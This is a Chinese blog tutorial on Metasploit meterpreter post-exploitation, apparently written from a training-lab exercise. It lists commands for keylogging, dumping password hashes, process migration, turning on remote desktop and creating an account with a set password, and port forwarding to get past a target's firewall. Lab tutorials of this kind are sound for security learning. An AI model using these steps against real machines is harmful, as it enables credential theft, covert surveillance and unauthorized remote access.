metasploit后渗透之基础知识

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF后渗透知识

文件搜索

当我们获取了session,在meterpreter中还可以做哪些操作呢?

sysinfo #查看系统信息
screenshot #屏幕截图
search -d c: -f *.exe #文件搜索

在这里插入图片描述
将C盘下面所有的exe文件搜索出来。
在这里插入图片描述

文件上传&下载

pwd #查看当前目录
download C:\\Users\\test\\hash.txt hash.txt #文件下载
getlwd #查看目标机的当面目录
upload /var/www/msf.php msf.php #文件上传

在这里插入图片描述

run post/windows/capture/keylog_recorder #键盘记录

这里就可以将你键盘输入的内容进行记录,当然复制粘贴的无法记录。
在这里插入图片描述

run模块初识

在meterpreter里面run 具有很多模块可以进行:
在这里插入图片描述

扫描内网

内网发现:

run arp_scanner -r 10.10.10.0/24

在这里插入图片描述
同样可以使用命令进入cmd:

shell #命令行
chcp 65001 #修改编码 ,避免乱码格式
arp -a # 内网主机发现

在这里插入图片描述

HASH导出&进程迁移

hashdump #导出hash
ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。
migrate PID号 #迁移进程

从这里我们可以看出这是个域环境。
在这里插入图片描述
进程迁移:
在这里插入图片描述

访问远程端口

开启远程桌面:

run getgui -e #

在这里插入图片描述
这里就已经将远程桌面已打开,我们只需利用这个命令创建一个账号,便可登陆:

run getgui -p QWEasd123 -u Long #建立账号,但这样建立账号并没有加入用户组,所以一般使用shell里面去建立。

在这里插入图片描述
但如果目标机开启了防火墙,那么就算远程桌面开启的,我们同样无法进行连接:
在这里插入图片描述
在这里插入图片描述

端口转发

那我们就需要利用端口转发的技术,来将远程端口给转发出来:

netstat #来查看远程桌面是否开启:这里如果远程端口被修改,我们同样是可以利用命令来进行查看:
tasklist /svc | find "TermService" #进入shell,查看远程桌面服务的PID
netstat -ano | find "PID号" #利用PID号来查看远程桌面的端口号

在这里插入图片描述
在这里插入图片描述
将端口转发至本地1234端口:

portfwd add -l 1234 -p 3389 -r 10.10.10.158 #-r 就是填写被攻击机
rdesktop 127.0.0.1:1234 #连接本地1234端口

这样就让被攻击机主动来请求我们的攻击机,从而绕过防火墙限制:

portfwd list #查看添加的条目

在这里插入图片描述

本地回连

使用本地1234端口成功连接被攻击机远程桌面:
在这里插入图片描述
同样可以使用命令进行清除:

portfwd flush #进行清除
help portfwd #这是可以进行查看有哪些命令

在这里插入图片描述

  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值